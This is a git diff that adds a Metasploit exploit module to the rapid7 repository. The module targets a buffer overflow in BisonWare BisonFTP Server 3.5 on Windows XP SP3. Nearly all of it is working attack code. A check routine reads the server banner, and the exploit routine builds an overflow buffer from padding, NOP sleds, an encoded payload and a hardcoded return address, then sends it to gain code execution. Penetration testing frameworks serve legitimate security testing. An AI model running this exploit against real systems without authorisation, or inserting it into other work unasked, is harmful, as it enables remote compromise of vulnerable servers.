rapid7 · wchen-r7 · Nov 25, 2015 · Nov 20, 2015 · Nov 20, 2015 · Nov 20, 2015
diff --git a/modules/exploits/windows/ftp/bison_ftp_bof.rb b/modules/exploits/windows/ftp/bison_ftp_bof.rb
@@ -0,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Ftp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'			 => 'BisonWare BisonFTP Server Buffer Overflow',
+      'Description'	 => %q{
+        BisonWare BisonFTP Server 3.5 is prone to an overflow condition.
+        This module exploits a buffer overflow vulnerability in the said
+        application.
+      },
+      'Platform'		 => 'win',
+      'Author'		 =>
+        [
+          'localh0t', # initial discovery
+          'veerendragg', # initial msf
+          'Jay Turla' # msf
+        ],
+      'License'		 => MSF_LICENSE,
+      'References'	 =>
+        [
+          [ 'CVE', '1999-1510'],
+          [ 'BID', '49109'],
+          [ 'EDB', '17649'],
+          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']
+        ],
+      'Privileged'	 => false,
+      'DefaultOptions' =>
+        {
+          'VERBOSE'  => true
+        },
+      'Payload'		 =>
+        {
+          'Space'          => 385,
+          'BadChars'       => "\x00\x0a\x0d",
+        },
+      'Targets'		=>
+        [
+          [ 'Bisonware FTP Server / Windows XP SP3 EN',
+            {
+              'Ret' => 0x0040333f,
+              'Offset'   => 1432
+            }
+          ],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 07 2011'))
+  end
+
+  def check
+    connect_login
+    disconnect
+    if /BisonWare BisonFTP server product V3\.5/i === banner
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    connect
+    print_status('Triggering the prompt for an unregistered product')
+    sock.put('')
+    print_status('Disconnecting...')
+    disconnect
+
+    print_status('Connecting for the second time to deliver our payload...')
+    connect #connect for the second time
+
+    buf = rand_text_alpha(1028)
+    buf << make_nops(16)
+    buf << payload.encoded
+    buf << make_nops(388 - payload.encoded.length)
+    buf << [target.ret].pack('V')
+    buf << rand_text_alpha(39)
+    print_status('Sending payload...')
+
+    sock.put(buf)
+    handler
+    disconnect
+  end
+end